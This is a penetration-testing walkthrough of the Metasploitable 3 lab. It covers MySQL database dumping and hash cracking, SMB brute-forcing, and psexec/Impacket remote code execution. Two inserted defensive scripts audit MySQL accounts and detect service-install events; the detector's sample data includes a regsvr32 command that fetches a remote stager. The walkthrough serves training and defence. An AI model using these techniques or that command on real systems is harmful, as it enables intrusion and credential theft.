border="0"></a></h4><br><h3>Enumerating MySQL using Metasploit</h3><p>This module will enumerate all MySQL accounts on the system and their various privileges.<p><a href="https://drive.google.com/uc?id=1Aa3SQjAJ_0rAFciUWFJQAuTLLJOCi6mt" target="_blank"><img width="766" height="706" title="Enumerating MySQL with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating MySQL with Metasploit" src="https://drive.google.com/uc?id=1ycZklzUujASdBXM28fHLfa_sOmyQuYch" border="0"></a><p>You can also dump the password hashes. 
However, in this case there are no hashes to display because the root user has a blank password.<p><a href="https://drive.google.com/uc?id=142IRDQR9TAIWm_S9kMIAvFEhlHBpsrV2" target="_blank"><img width="667" height="313" title="Enumerating MySQL with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating MySQL with Metasploit" src="https://drive.google.com/uc?id=1hjUiH9TTJBfluIKO4l4Zlop2kLqHfl4j" border="0"></a><p>You can also retrieve the full content of the database:<h4><a href="https://drive.google.com/uc?id=10hM_PyLbqIgMatmhKA587xKHcN_UtpUw" target="_blank"><img width="806" height="327" title="Dumping MySQL database with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping MySQL database with Metasploit" src="https://drive.google.com/uc?id=1jip-WiIXlRWO5SUiKeDHYWBfDyV_DdWm" border="0"></a></h4><br><h3>Dumping the database using mysql</h3><p>Use the <b><em>show databases</em></b> SQL command to show the available databases.<p><a href="https://drive.google.com/uc?id=1VhNvEn6zpL7tLNcI21lB5MPZtfriOIrQ" target="_blank"><img width="743" height="330" title="Dumping MySQL database with mysql" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping MySQL database with mysql" src="https://drive.google.com/uc?id=1GVQA8dlwVcD3l40V9VnFEeoetXPrN3Sy" border="0"></a><p>Use the <b><em>use databasename</em></b> SQL command to select a particular database.<p><a href="https://drive.google.com/uc?id=1PtpXDlENGstDMU7cJB7PCK_qeuIhWKw1" target="_blank"><img width="738" height="144" title="Dumping MySQL database with mysql" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping MySQL database with mysql" src="https://drive.google.com/uc?id=1JkJlwnt5blu8kqds1X5o-oDQoFR4ybio" border="0"></a><p>Once you've selected a particular database, you can start to explore it. 
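<p>The finding that makes this whole section possible is a root account with a blank password that accepts connections from any host. The following audit script is an added example (not code from the original post): it takes rows shaped like the result of <code>SELECT User, Host, authentication_string FROM mysql.user;</code> (on MySQL 5.6 and earlier the column is called <code>Password</code>) and flags the account weaknesses a defender should remove before a scanner finds them. The sample rows are constructed, and the <code>mysql_native_hash()</code> helper exists only to build a realistic hashed row.</p>

```python
"""Audit MySQL account rows for blank passwords and over-broad host patterns.

Added example, not code from the original post. Input rows are assumed to be
(User, Host, authentication_string) tuples as returned by
    SELECT User, Host, authentication_string FROM mysql.user;
The sample rows below are constructed for illustration.
"""
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    user: str
    host: str
    issue: str


def mysql_native_hash(password: str) -> str:
    """mysql_native_password format: '*' + upper-hex SHA1(SHA1(password)).
    Used here only to construct sample rows that look like real ones."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


# Constructed sample of mysql.user rows: (User, Host, authentication_string).
SAMPLE_ROWS = [
    ("root", "%", ""),                                        # the case found in the post
    ("root", "localhost", ""),                                # blank, but local only
    ("wordpress", "localhost", mysql_native_hash("changeme")),
    ("backup", "10.0.0.%", mysql_native_hash("changeme")),    # subnet wildcard
]

# Hosts that only allow a login from the database server itself.
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def audit_accounts(rows):
    """Return one Finding per weakness spotted in the account rows."""
    findings = []
    for user, host, auth in rows:
        if auth == "":
            findings.append(Finding(user, host, "empty password"))
        if "%" in host or "_" in host:        # MySQL host wildcards
            findings.append(Finding(user, host, "wildcard host allows remote logins"))
        if user == "root" and host not in LOCAL_HOSTS:
            findings.append(Finding(user, host, "root login allowed from a remote host"))
    return findings


def worst_accounts(rows):
    """(user, host) pairs that are passwordless AND reachable remotely:
    exactly what the brute-force tools above stumble onto immediately."""
    return sorted({(f.user, f.host) for f in audit_accounts(rows)
                   if f.issue == "empty password" and f.host not in LOCAL_HOSTS})


if __name__ == "__main__":
    for finding in audit_accounts(SAMPLE_ROWS):
        print(f"{finding.user}@{finding.host}: {finding.issue}")
    print("critical:", worst_accounts(SAMPLE_ROWS))
```

<p>Run against a real export, <code>worst_accounts()</code> is the list to fix first (set a password and restrict <code>Host</code>); the wildcard and remote-root findings are the reason a brute-force attempt from another machine is even possible.</p>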
<p><a href="https://drive.google.com/uc?id=1uVL_9uvS30dZJ4FhNVVJKuhYDtxybH3o" target="_blank"><img width="321" height="255" title="Dumping MySQL database with mysql" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping MySQL database with mysql" src="https://drive.google.com/uc?id=1ljszw24x1WppM73cj6PORqzjN7Ddi4Ay" border="0"></a><p>Select a different database and explore it.<p><a href="https://drive.google.com/uc?id=1YF3f-NYtuaS76a-gkTgblGJgWW_b1orZ" target="_blank"><img width="806" height="476" title="Dumping MySQL database with mysql" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping MySQL database with mysql" src="https://drive.google.com/uc?id=11--Bagt28eJ2RdhpAYbpW3ZOPoJAa1BS" border="0"></a><p>You can use the <b><em>describe</em></b> command to list the fields in each SQL table, as well as their data types.<p><a href="https://drive.google.com/uc?id=1dEJzYrj8swOEAHqb0srah2PHirms-v4d" target="_blank"><img width="799" height="596" title="Dumping MySQL database with mysql" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping MySQL database with mysql" src="https://drive.google.com/uc?id=17eVnYn1ztdWOQ8JCBU0xJdcT2UpwXwsL" border="0"></a><p>Once you have seen the fields inside the table, you can see the content of specific fields:<h4><a href="https://drive.google.com/uc?id=1Jx2RJJAEQj-ni108ipjRe72csaMyfeNG" target="_blank"><img width="467" height="225" title="Dumping MySQL database with mysql" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping MySQL database with mysql" src="https://drive.google.com/uc?id=1wTOtSPNfW7IdU2BHmVQMLqVnyCAfZaQ9" border="0"></a></h4><h4><br></h4><h3>Dumping the database using mysqlshow</h3><p>You can also use <b><em>mysqlshow</em></b> to easily show the contents of the database. 
Use the <b><em>--host</em></b> option to query a remote database.<p><a href="https://drive.google.com/uc?id=1RvqnhJr97_Z0o811P1T0TWDX-YZwTnAt" target="_blank"><img width="517" height="499" title="Dumping MySQL database with mysqlshow" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping MySQL database with mysqlshow" src="https://drive.google.com/uc?id=1kxSYfgAoYic8rPwJPah3xXSUbxhMk5lL" border="0"></a><br><h3>Dumping the database using mysqldump</h3><p>Like the mysqlshow command, the <b><em>mysqldump</em></b> command accepts the <b><em>--host</em></b> argument. To dump a table, run the command like this:<p><strong><em># mysqldump --host=10.0.0.27 [database] [tablename]</em></strong><p>This will produce an SQL script that recreates the entire database from scratch. Be careful and run <code>mysqlshow --count</code> first, to avoid dumping out a 500 GB database.<p><a href="https://drive.google.com/uc?id=14ZPMXB1gujCi0RJyUAcacTUcqSXykswQ" target="_blank"><img width="806" height="258" title="Dumping MySQL database with mysqldump" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping MySQL database with mysqldump" src="https://drive.google.com/uc?id=1JoN5inmNNYXiU4yLZ6QdBSjoztnEJ9pu" border="0"></a><p><a href="https://drive.google.com/uc?id=13w0GFiC7OT-e3NWMypcp-zpaYEmvVQ7V" target="_blank"><img width="806" height="193" title="Dumping MySQL database with mysqldump" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping MySQL database with mysqldump" src="https://drive.google.com/uc?id=12ZiytKkj7okDtpQe43T6mlZVAnTOBI6_" border="0"></a><p>From this, you can see some interesting things… Usernames and password hashes! You can use <a href="https://charlesreid1.com/wiki/Hash-Identifier"><b>Hash-Identifier</b></a> to identify the hash. 
<p><a href="https://drive.google.com/uc?id=1Z-Y267as5CB3kMsp5prQJnbkaaKMUnNd" target="_blank"><img width="683" height="352" title="Identifying hashes" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Identifying hashes" src="https://drive.google.com/uc?id=1nK0Fk9oNmMqUykcG-VwRWN3RCNNxb9zR" border="0"></a><p>Looks like it is an MD5 hash. My advice: pay attention to the gathered info, but don’t waste time trying to crack this.<h3>Exploiting</h3><p>Just as an example, try to extract the hashes from the database:<p><a href="https://drive.google.com/uc?id=1awkJYlk8ntU-2i5VfqWSjjDo3NYleh6g" target="_blank"><img width="681" height="782" title="Dumping and cracking MySQL user hashes" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping and cracking MySQL user hashes" src="https://drive.google.com/uc?id=1X9fGvLI--pF1FOYG1uTwqtv_J9SOUsYc" border="0"></a><p>List the contents of the <em><strong>wp_users</strong></em> table and then select the two most relevant fields:<p><a href="https://drive.google.com/uc?id=1SlNW1XquHZXKb-SUwa_d4XLYWgdeYCqw" target="_blank"><img width="806" height="448" title="Dumping and cracking MySQL user hashes" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping and cracking MySQL user hashes" src="https://drive.google.com/uc?id=1nRUW-Sk4w9MQK-dv7hsk-XTfAWBaloHB" border="0"></a><p>Copy the hashes to a text file and adjust the format:<p><strong><em>user:hash</em></strong><p><a href="https://drive.google.com/uc?id=1wDxHCDr8Ax_5bsX6ZOd1GSBNN-xQws1z" target="_blank"><img width="535" height="259" title="Dumping and cracking MySQL user hashes" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping and cracking MySQL user hashes" src="https://drive.google.com/uc?id=1JcY9PdmEcPdL54So35NWe06nkOO6Uv7a" border="0"></a><p>Then crack the hashes:<p><a 
href="https://drive.google.com/uc?id=1OniboVbnGaAbijqmZtw4Pn3jsiOCx71f" target="_blank"><img width="806" height="251" title="Dumping and cracking MySQL user hashes" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping and cracking MySQL user hashes" src="https://drive.google.com/uc?id=18Euu_6U5CMtBqSbZ4JF14SZbqY8-NasA" border="0"></a><p><strong><br></strong><p><p><a title="Metasploitable 3 W2k8 Walkthrough: Part VII" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-3-w2k8-walkthrough-part_46.html"><br></a></p></p>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0tag:blogger.com,1999:blog-6396309617370994433.post-18387041553839529942020-11-05T07:51:00.000-08:002020-11-21T04:21:15.244-08:00Metasploitable 3 Windows Walkthrough: Part V<h2>Exploiting Port 445 – SMB</h2><p>This port is used by Server Message Block (SMB) for sharing files between different operating systems, i.e. Windows-Windows, Unix-Unix and Unix-Windows.<p>While Port 139 is known technically as “NBT over IP”, Port 445 is “SMB over IP”. Server Message Block in modern language is also known as Common Internet File System. 
SMB operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.<p>One of the first things you can try is to brute force your access.</p><h3>Brute forcing SMB using Metasploit</h3><p>Try using the credentials already in the database:<p><a href="https://drive.google.com/uc?id=1iDGQ8gXb1sFS-40oNchoCXz82bIAE2js" target="_blank"><img width="806" height="235" title="Accessing SMB with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing SMB with Metasploit" src="https://drive.google.com/uc?id=1bfLf711JEyRhX80U7SBhuffiLzlbI9Zh" border="0"></a><h3>Brute forcing SMB using Hydra</h3><p>Create and use a custom list for users and passwords:<p><a href="https://drive.google.com/uc?id=1qdUN8_h2zfHQ9naTctFY0wMY1B3D0v2Q" target="_blank"><img width="806" height="155" title="Brute forcing SMB with Hydra" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SMB with Hydra" src="https://drive.google.com/uc?id=11KV_3EH0_v0FRmzLBjDJWKgXEhYd6OZ-" border="0"></a><h4><a name="_Toc52385155"></a></h4><a name="more"></a><h3>Brute forcing SMB using Nmap</h3><p>Nmap could also be used to brute force the SMB service. Unfortunately, the <b><em>smb-brute</em></b> script is not working anymore…<p><a href="https://drive.google.com/uc?id=1kyk6Q-qhmWxcSxqKzIheXgB04AR-Uk97" target="_blank"><img width="806" height="174" title="Brute forcing SMB with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SMB with Nmap" src="https://drive.google.com/uc?id=11fqDRtQfK4ks4Z6bpTodneBMIVTz2QeS" border="0"></a><h3>Enumerating SMB using Metasploit</h3><p>Several tools can be used to extract information from the target via the SMB service. 
As expected, Metasploit has a number of modules that can be used against SMB to enumerate the remote machine:<p><a href="https://drive.google.com/uc?id=1_R_BadVjB57_QZaghcP-HBmr5YAlwxJW" target="_blank"><img width="526" height="136" title="Enumerating SMB with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMB with Metasploit" src="https://drive.google.com/uc?id=1tVNBaQQMdL_0rRpF3NvgZN-6gGOnNSy3" border="0"></a><p><a href="https://drive.google.com/uc?id=15E41M6nKH91fwlRNTqZEDw8pxRdzBn2o" target="_blank"><img width="738" height="121" title="Enumerating SMB with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMB with Metasploit" src="https://drive.google.com/uc?id=1Rwc2nuUJ_Ppg4F8--NG1sl4xVk1cq__f" border="0"></a><p><a href="https://drive.google.com/uc?id=1L4ys2DTLDmLhB3U1ZRhWy-rGpk8Jwgyz" target="_blank"><img width="731" height="279" title="Enumerating SMB with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMB with Metasploit" src="https://drive.google.com/uc?id=1gk5hWRDHXc_Q9lFemF_UE9Je7Ctj_GWc" border="0"></a><p><a href="https://drive.google.com/uc?id=1YAWBOUXQWvWwuvIXXt5qC0orMYxruztf" target="_blank"><img width="802" height="200" title="Enumerating SMB with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMB with Metasploit" src="https://drive.google.com/uc?id=1zLQ9q2jzPlebfK65iJwv7t5cPDLJyNNZ" border="0"></a><p><a href="https://drive.google.com/uc?id=1dbPHnNHj_chqzr6v3qgq_9YbQsoe9Php" target="_blank"><img width="845" height="560" title="Enumerating SMB with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMB with Metasploit" src="https://drive.google.com/uc?id=1in4pxVYmD2e9I4FOXs2qtnHr85EcTZVY" border="0"></a><p>You will get a significant amount of information:<ul><li>SMB versions supported (might be vulnerable)</li><li>Shared drives (might be exploitable)</li><li>Usernames (might be used to exploit other services)</li><li>User Security Identifiers (might be used for exploitation)</li></ul><h3>Enumerating SMB using Nmap</h3><p>Nmap has many NSE scripts that can be used against hosts where the SMB service is running, but not all of them return useful results:<p><a href="https://drive.google.com/uc?id=1rJfeR7XJm84-1EBufm_q7X9Tm3vgL-9m" target="_blank"><img width="806" height="316" title="Enumerating SMB with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMB with Nmap" src="https://drive.google.com/uc?id=13DRqeOjcyS9CoVbNigx0yRBhYLhjsTWH" border="0"></a><p><a href="https://drive.google.com/uc?id=1y4X2UrXDj2XYWaNqN8EJ_GQqOnY-FvQ8" target="_blank"><img width="806" height="217" title="Enumerating SMB with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMB with Nmap" src="https://drive.google.com/uc?id=1qtFO3crFoSt4_ax9Hqq4U3-gHRlJwWv9" border="0"></a><p><a href="https://drive.google.com/uc?id=1RLHwoANctiTKZxxjxSzhCy9Ittz5KIkw" target="_blank"><img width="806" height="243" title="Enumerating SMB with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMB with Nmap" src="https://drive.google.com/uc?id=1t4zwqxzgRKQb3Ubn6n5IKjtRjHdvIwoF" border="0"></a><p>Nmap can also be used as a light vulnerability scanner, with several scripts written specifically for port 445 services.<p><a href="https://drive.google.com/uc?id=1QZYWdYPv6ESxRlzbvgb_bQgUmbJwWp25" target="_blank"><img width="806" height="431" title="SMB vulnerability scanning with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="SMB vulnerability scanning with Nmap" src="https://drive.google.com/uc?id=1ruZK_ZGiD3GSwu7bTtVEuiQ7BfslA_Hr" border="0"></a><h3>Enumerating SMB using smbclient</h3><p>There are several other tools available in Kali Linux to enumerate the SMB service.<p>You can use a tool called <em><b>smbclient</b></em> to connect to the Metasploitable 3 box and list the available shares, but you will need a valid username/password.</p><p><a href="https://drive.google.com/uc?id=1L4et6T8zdr0bTQZp4EBo-41-6vTeKoBf" target="_blank"><img width="806" height="192" title="Listing SMB shares with smbclient" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Listing SMB shares with smbclient" src="https://drive.google.com/uc?id=19Ht-ZDoDm1ain7io3A9JADGwZCwUHaVg" border="0"></a><p><a href="https://drive.google.com/uc?id=1_m5jF34p0q3PQV-ELOJQ7HqxAiU1Tdm9" target="_blank"><img width="806" height="233" title="Listing SMB shares with smbclient" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Listing SMB shares with smbclient" src="https://drive.google.com/uc?id=1XXyxQ7Tu5bCjlQhE1vayUGB2_3MlI39A" border="0"></a><p><b>NOTE</b>: In the current Kali version you will need to edit the <b><em>/etc/samba/smb.conf</em></b> file to get the proper results.<p><a href="https://drive.google.com/uc?id=1lb1scbVA_uuXCvlC4TWvBGBmfxmLu7fG" target="_blank"><img width="728" height="499" title="Editing the /etc/samba/smb.conf file" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Editing the /etc/samba/smb.conf file" src="https://drive.google.com/uc?id=1zAD42ETZeYLIrrH-qG8qp1AEBUH8IAQa" border="0"></a><h3>Enumerating SMB using smbmap</h3><p><a href="https://drive.google.com/uc?id=1mHIyGyuY9POiTuNOE2xdhwoO2oPxtPlV" target="_blank"><img width="806" height="146" title="Listing SMB shares with smbmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Listing SMB shares with smbmap" src="https://drive.google.com/uc?id=1pz3yG4XiJmQxL8MwAr3D8fn6OX9NQIzd" border="0"></a><p>These results from <b><em>smbmap</em></b> are critical because you can see that two of the shared folders are writable, and therefore potentially exploitable.<h3>Enumerating SMB using enum4linux</h3><p><a href="https://drive.google.com/uc?id=10W8BQXwNmA8RRI9aVORkYhCKNROultOw" target="_blank"><img width="815" height="36" title="Enumerating SMB with enum4linux" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMB with enum4linux" src="https://drive.google.com/uc?id=1dymfLCjRLiKLO5JqPXobKg8GpcBVPBDc" border="0"></a></p><p><a href="https://drive.google.com/uc?id=1rwX-V5NYTGgokmwGaSJTatOdI__MrvU3" target="_blank"><img width="818" height="777" title="Enumerating SMB with enum4linux" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMB with enum4linux" src="https://drive.google.com/uc?id=1ItGBhOxmr_H3rWiAsnAQDGA4C-_W57pg" border="0"></a><p>Patiently, and using several tools, you will get a lot of useful information about your target. There are other tools available but, in this case, they return absolutely nothing. <p>After the enumeration, and using the information retrieved, you can now exploit your target via SMB.</p><h3>Exploiting SMB using Metasploit</h3><p>MSF has a number of modules available to exploit SMB.</p><h4>Windows Authenticated User Code Execution</h4><p>This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. The module is similar to the “<em><strong>psexec</strong></em>” utility provided by SysInternals. This module is now able to clean up after itself. 
The service created by this tool uses a randomly chosen name and description.<p><a href="https://drive.google.com/uc?id=1jWf9ekaqPIr96HJPAg-9hbIcC2Qz2W7V" target="_blank"><img width="806" height="389" title="Exploiting SMB with Windows Authenticated User Code Execution" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting SMB with Windows Authenticated User Code Execution" src="https://drive.google.com/uc?id=11sqIU7OkiKCUZjUMmyoz1aKCS9k_mv-Z" border="0"></a><h4>Authenticated PowerShell Command Execution</h4><p>The old <b><em>psexec_psh</em></b> module is now deprecated, but you can get the same functionality by selecting a different target in the <em><b>psexec</b></em> module (<i>Target 1-PowerShell</i>). This option uses a valid administrator username and password to execute a PowerShell payload using a technique similar to the “psexec” utility provided by SysInternals. The payload is Base64-encoded and executed from the command line using the <em>-EncodedCommand</em> flag. Using this method, the payload is never written to disk and, given that each payload is unique, it is less prone to signature-based detection. <p><a href="https://drive.google.com/uc?id=1B0bo3glRkPVSz6TB4WqDzLUZB1S5D9bT" target="_blank"><img width="806" height="469" title="Exploiting SMB with Authenticated PowerShell Command Execution" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting SMB with Authenticated PowerShell Command Execution" src="https://drive.google.com/uc?id=1VobqeK5wWrhQ5n8bddqAz9bJ808ICxcX" border="0"></a><h4>Windows Authenticated Administration Utility</h4><p>This module uses a valid administrator username and password to execute an arbitrary command on one or more hosts, using a technique similar to the “psexec” utility provided by SysInternals. Daisy chaining commands with ‘&’ doesn’t work, so don’t waste your time trying. 
This module is useful because it doesn’t need to upload any binaries to the target machine.<p>This is in fact a two-stage attack:<ul><li>First, you use a module (<strong><em>web_delivery</em></strong>) to get malicious DLL code which you can use as an arbitrary command on the host.</li><ul><li>Select the appropriate target (<i>Target 3-Regsvr32</i>) and payload</li></ul><li>Then you use another module (<b><em>psexec_command</em></b>) to inject the previous code into the remote machine. </li></ul><p><a href="https://drive.google.com/uc?id=1oNy2ufJAR6hWnFHYewfaSEMLntR5VU2i" target="_blank"><img width="806" height="377" title="Generate malicious code" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Generate malicious code" src="https://drive.google.com/uc?id=1ELinDNY8gVI7jgBnA_6c__AzDv9QuI6z" border="0"></a></p><p>As soon as you run the auxiliary module <b><em>psexec_command</em></b> you will get a Meterpreter session with system privileges.<p><a href="https://drive.google.com/uc?id=10P1YJouVHIHHOmX9yqaCctBqphi4_8XA" target="_blank"><img width="806" height="439" title="Running malicious code to get a shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running malicious code to get a shell" src="https://drive.google.com/uc?id=1eH3HUn2t4tB2BCu7Ty58Qv3ACWTeqwf5" border="0"></a><h4>Impacket WMI Exec</h4><p><b><em>Impacket</em></b> is a collection of Python classes and functions for working with various Windows network protocols. It is a centerpiece of many different pentesting tools. Apart from being a library, it also contains a number of examples which we can use right away for remote command execution. 
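<p>The psexec, PowerShell-target and psexec_command techniques described above all end up installing a service on the target, and Windows records every service install in the System log as event 7045. The Python script below is an added example (not code from the original post, from Metasploit or from Impacket): it reads constructed 7045 records as JSON lines and flags the three traits this section mentions, a randomly generated service name, a PowerShell <b><em>-EncodedCommand</em></b> payload (which it decodes from UTF-16LE base64 so an analyst can see what ran), and a regsvr32 command line that loads a remote scriptlet. The random-name heuristic, the regsvr32 pattern and every sample event are this example's own assumptions, not facts from the page.</p>

```python
"""Flag PsExec-style remote service installs in Windows System log 7045 records.

Added example, not code from the original post, Metasploit or Impacket.
The heuristics and all sample records below are constructed for illustration.
"""
import base64
import json
import re
from typing import Optional

VOWELS = set("aeiouAEIOU")
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
ENCODED_CMD = re.compile(r"(?i)(?:^|\s)-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})")
# regsvr32 told to fetch its install script from a URL (assumed indicator)
REGSVR32_URL = re.compile(r"(?i)regsvr32(?:\.exe)?\b.*/i:https?://")


def looks_random(name: str) -> bool:
    """Heuristic for machine-generated service names (assumption: letters only,
    at least 8 chars, several case flips, few vowels). Tune against your baseline."""
    if len(name) < 8 or not name.isalpha():
        return False
    flips = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    vowel_ratio = sum(c in VOWELS for c in name) / len(name)
    return flips >= 3 and vowel_ratio <= 0.3


def decode_encoded_command(image_path: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -EncodedCommand argument (base64 of
    UTF-16LE text), or None when the command line carries no such argument."""
    m = ENCODED_CMD.search(image_path)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(records):
    """records: iterable of JSON strings, one System log event each.
    Returns a list of findings for the 7045 (service installed) events."""
    findings = []
    for line in records:
        ev = json.loads(line)
        if ev.get("EventID") != 7045:
            continue
        name, path = ev.get("ServiceName", ""), ev.get("ImagePath", "")
        reasons = []
        if looks_random(name):
            reasons.append("random-looking service name")
        decoded = decode_encoded_command(path)
        if decoded is not None:
            reasons.append("PowerShell -EncodedCommand payload")
        if REGSVR32_URL.search(path):
            reasons.append("regsvr32 loading a remote scriptlet")
        if reasons:
            findings.append({"service": name, "reasons": reasons, "decoded": decoded})
    return findings


# Constructed sample events (not real log data); the encoded payload is harmless
_ENC = base64.b64encode("Write-Host hi".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    json.dumps({"EventID": 7045, "ServiceName": "Spooler",
                "ImagePath": r"C:\Windows\System32\spoolsv.exe"}),
    json.dumps({"EventID": 7045, "ServiceName": "MRWeZwfVJwSK",
                "ImagePath": r"%SYSTEMROOT%\kRnGhqZc.exe"}),
    json.dumps({"EventID": 7045, "ServiceName": "gpclient",
                "ImagePath": f"%COMSPEC% /c powershell.exe -nop -w hidden -enc {_ENC}"}),
    json.dumps({"EventID": 7045, "ServiceName": "wdsvc",
                "ImagePath": "regsvr32.exe /s /n /u /i:http://192.0.2.10:8080/stager.sct scrobj.dll"}),
    json.dumps({"EventID": 7036, "ServiceName": "MRWeZwfVJwSK", "State": "stopped"}),
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

<p>Run against real data, feed it the 7045 events exported as JSON (for example from <b><em>wevtutil</em></b> or a SIEM) and pair the findings with the 7036 stop events for the same service name: the psexec module's clean-up produces a very short-lived service, which is itself a strong signal.</p>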
<p>The following table provides a summary of all discussed Impacket Remote Code Execution methods:<table border="1" cellspacing="0" cellpadding="0"><tbody><tr><td width="171" valign="top"><p align="center"><b><font size="3">Method</font></b></p></td><td width="171" valign="top"><p align="center"><b><font size="3">RCE type</font></b></p></td><td width="171" valign="top"><p align="center"><b><font size="3">Port(s) used</font></b></p></td></tr><tr><td width="171"><p align="center"><font size="3">psexec.py</font></p></td><td width="171"><p><font size="3">interactive shell</font></p></td><td width="171" valign="top"><p><font size="3">tcp/445</font></p></td></tr><tr><td width="171"><p align="center"><font size="3">dcomexec.py</font></p></td><td width="171"><p><font size="3">semi-interactive shell</font></p></td><td width="171" valign="top"><p><font size="3">tcp/135</font><p><font size="3">tcp/445</font><p><font size="3">tcp/49751 (DCOM)</font></p></td></tr><tr><td width="171"><p align="center"><font size="3">smbexec.py</font></p></td><td width="171"><p><font size="3">semi-interactive shell</font></p></td><td width="171" valign="top"><p><font size="3">tcp/445</font></p></td></tr><tr><td width="171"><p align="center"><font size="3">wmiexec.py</font></p></td><td width="171"><p><font size="3">semi-interactive shell</font></p></td><td width="171" valign="top"><p><font size="3">tcp/135</font><p><font size="3">tcp/445</font><p><font size="3">tcp/50911 (Winmgmt)</font></p></td></tr><tr><td width="171"><p align="center"><font size="3">atexec.py</font></p></td><td width="171"><p><font size="3">command</font></p></td><td width="171" valign="bottom"><p><font size="3">tcp/445</font></p></td></tr></tbody></table><p>This module uses a similar approach to psexec but executes commands through WMI.<p><a href="https://drive.google.com/uc?id=1k5aJEFgYIjymIA1KjiIc1IzPr6AJva4W" target="_blank"><img width="806" height="466" title="Exploiting SMB with Impacket" style="margin: 0px auto; float: 
none; display: block; background-image: none;" alt="Exploiting SMB with Impacket" src="https://drive.google.com/uc?id=136dYZRQlZD_-bt1l-z8pO4a9mWYa8YV4" border="0"></a><p>Unfortunately, this module doesn’t work in the current Kali release due to Python syntax incompatibilities. The previous image was obtained using Kali 2019.1.<h4>Impacket DCOM Exec</h4><p>A different approach is to use DCOM to execute remote commands, like <b><em>creating a user</em></b> or anything else:<p><a href="https://drive.google.com/uc?id=1-OO-h5Qf0UKeg8pRp6m181NP457efIcp" target="_blank"><img width="806" height="331" title="Creating a user with Impacket" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Creating a user with Impacket" src="https://drive.google.com/uc?id=1xd9yssitwns8QF0prO9TmvWpsQjSZkNn" border="0"></a><p>Unfortunately, this module also doesn’t work in the current Kali release. But there is another module that tries to dump hashes from the remote machine without executing any agent there.<p><a href="https://drive.google.com/uc?id=1EEGAm2_Qv7fxBLb6P-SHaR7kK34cHK28" target="_blank"><img width="809" height="676" title="Dumping hashes with Impacket" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping hashes with Impacket" src="https://drive.google.com/uc?id=1kUN7M9Bnokrbjc3Ni9zIZccbQp4WmDiD" border="0"></a><h4>Other Metasploit modules</h4><p>There are other modules created to attack the SMB service, but they require some social engineering because the target needs to access a share on the attacker machine:<ul><li>NTLM Capture (<b><em>auxiliary/server/capture/smb</em></b>)</li><ul><li>This module provides an SMB service that can be used to capture the challenge-response password hashes of an SMB client system.</li><li>It needs to run in coordination with <b><em>auxiliary/spoof/nbns/nbns_response</em></b></li></ul><li>DoS (<b><em>auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop</em></b>)</li><ul><li>It 
